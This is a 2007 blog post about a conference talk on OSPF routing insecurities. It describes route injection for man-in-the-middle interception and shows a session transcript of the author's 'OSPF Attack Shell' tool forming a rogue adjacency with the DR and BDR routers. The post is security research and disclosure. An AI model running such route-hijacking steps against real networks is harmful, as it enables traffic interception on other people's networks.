Conference IT Underground, Prague 2007: OSPF routing protocol insecurities, still a problem?
IT Underground was held in Prague from March 7th, to March 9th. With Dror Roecher (ERNW), we talked about OSPF security, and about a new tool I developped to show some tricks against OSPF routing infrastructure.
First part: learning OSPF
Dror also spoke about various theoritical attacks, and explained why they should be possible. One of the attack was to inject a new route in an OSPF router routing table, to basically do a man in the middle attack. If such an attack were successful, we would be able to redirect trafic to the IP address of our choice, giving us the ability to read all network trafic. The cool thing with OSPF is that this injected route will be added to all OSPF routers that have "links" together (that is, not only the ones on the same broadcast domain as the attacker).
Slides for this part may be found on IT Underground web site .
Second part: the tool
So, this tool basically shows that the injection of a new route is possible, and totally works. I developed this tool after being contacted by Dror, who was in search for a guy able to verify his thoughts about OSPF attacks. I started the development, by first implementing the OSPF encoding and decoding at the frame level using Net::Frame . The tool was named OSPF Attack Shell, because it is made like a classical shell, into which you can pass commands.
In the first step of the demo, we showed how to become a true neighbor of currently available OSPF routers (DR, BDR). A true neighbor has an adjacency relationship with DR and BDR. Here is how to do that:
# ospf-ash.pl -- OSPF Attack Shell - 0.14 -- Using device : eth0 Using source IP : 192.168.0.101 Using source MAC: 00:13:a9:2c:5b:a3 ash> listen Hello from: 192.168.0.21 Found: DR : 192.168.0.22 Found: BDR: 192.168.0.21 Found: neighborList: 192.168.0.22 ash> exchange 192.168.0.22: exchange complete 192.168.0.21: exchange complete ash> lock
The first command "listen" just waits for a Hello frame to be emitted by an OSPF router currently on the broadcast network. Then, the "exchange" command tries to establish an adjacency relation with DR and BDR. In our example, it worked ok. Finally, the "lock" command will keep sending a Hello frame from our IP address to keep the neighborship with DR and BDR.
 Routing Protocol Security - still a problem? - Dror Roecher http://www.ernw.de/content/e7/e181/e520/download523/ospf-sec_02_dr_ger.pdf  Net::Frame - GomoR http://search.cpan.org/~gomor/